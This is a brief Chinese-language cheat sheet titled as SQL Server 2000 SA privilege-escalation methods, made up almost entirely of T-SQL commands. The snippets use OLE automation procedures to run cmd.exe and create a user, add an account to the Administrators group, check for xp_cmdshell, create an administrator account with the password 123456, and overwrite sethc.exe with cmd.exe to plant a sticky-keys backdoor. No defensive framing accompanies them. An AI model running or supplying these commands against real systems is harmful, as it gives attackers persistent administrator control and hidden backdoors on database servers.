sql server 2000 SA提权方法

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators IUSR_InterNet /add'

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回1正版拓展存在


DECLARE @o int
DECLARE @z int

EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty   @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''

rundll32 netplwiz.dll,UsersRunDll

lusrmgr.msc

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe'